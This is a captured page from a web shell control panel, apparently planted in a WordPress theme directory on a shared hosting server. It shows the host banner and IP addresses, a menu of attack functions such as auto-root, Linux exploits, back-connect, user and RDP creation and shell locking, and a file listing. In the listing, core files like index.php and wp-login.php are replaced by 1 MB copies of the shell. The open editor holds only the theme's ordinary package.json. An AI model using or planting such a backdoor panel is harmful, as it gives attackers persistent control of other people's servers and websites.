Linux webm008.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.110.20.8 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
5.4.45
einst
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
einst /
www /
wp-content /
themes /
twentytwenty /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.htaccess
356
B
-rw-r--r--
.stylelintrc.json
281
B
-rw-r--r--
2020-square-2-20260722174433.p...
3.29
KB
-rw-r--r--
2020-square-2.png
3.29
KB
-rw-r--r--
404.php
808
B
-rw-r--r--
about-20260722062148-202607221...
1.04
MB
-rw-r--r--
about-20260722062148.php7
1.04
MB
-rw-r--r--
about.php
1.04
MB
-rw-r--r--
about.php7
1.04
MB
-rw-r--r--
alfa-rex-20260722023446.php56
1.04
MB
-rw-r--r--
alfa-rex-20260722081757.php8
1.04
MB
-rw-r--r--
alfa-rex.php56
1.04
MB
-rw-r--r--
index.php
1.04
MB
-rw-r--r--
package.json
2.04
KB
-rw-r--r--
screenshot.png
51.82
KB
-rw-r--r--
singular-20260722062528.php
553
B
-rw-r--r--
singular.php
553
B
-rw-r--r--
wp-login-20260722062143-202607...
1.04
MB
-rw-r--r--
wp-login-20260722062143.php
1.04
MB
-rw-r--r--
wp-login.php
1.04
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "twentytwenty", "version": "1.0.0", "description": "Default WP Theme", "author": "The WordPress Contributors", "license": "GPL-2.0-or-later", "keywords": [ "WordPress", "Theme", "TwentyTwenty" ], "homepage": "https://github.com/wordpress/twentytwenty#readme", "repository": { "type": "git", "url": "git+https://github.com/wordpress/twentytwenty.git" }, "bugs": { "url": "https://github.com/wordpress/twentytwenty/issues" }, "devDependencies": { "@wordpress/browserslist-config": "^2.6.0", "@wordpress/scripts": "^5.0.0", "autoprefixer": "^9.6.1", "concurrently": "^4.1.2", "postcss-cli": "^6.1.3", "rtlcss": "^2.4.0", "stylelint-a11y": "^1.2.1" }, "browserslist": [ "extends @wordpress/browserslist-config" ], "rtlcssConfig": { "options": { "autoRename": false, "autoRenameStrict": false, "blacklist": {}, "clean": true, "greedy": false, "processUrls": false, "stringMap": [] }, "plugins": [], "map": false }, "scripts": { "build": "npm run build:vendor-prefixes && npm run build:rtl", "build:rtl": "concurrently \"npm run build:rtl-style\" \"npm run build:rtl-esb\" \"npm run build:rtl-esc\"", "build:rtl-style": "rtlcss style.css style-rtl.css", "build:rtl-esb": "rtlcss assets/css/editor-style-block.css assets/css/editor-style-block-rtl.css", "build:rtl-esc": "rtlcss assets/css/editor-style-classic.css assets/css/editor-style-classic-rtl.css", "build:vendor-prefixes": "concurrently \"npm run build:vendor-prefixes-style\" \"npm run build:vendor-prefixes-esb\" \"npm run build:vendor-prefixes-esc\"", "build:vendor-prefixes-style": "postcss -r --no-map style.css assets/css/editor-style-block.css assets/css/editor-style-classic.css", "build:vendor-prefixes-esb": "postcss -r --no-map assets/css/editor-style-block.css ", "build:vendor-prefixes-esc": "postcss -r --no-map assets/css/editor-style-classic.css", "lint:css": "wp-scripts lint-style 'style.css' 'assets/**/*.css'", "lint:js": "wp-scripts lint-js 'assets/**/*.js'", "lint:pkg-json": "wp-scripts lint-pkg-json" } }
Close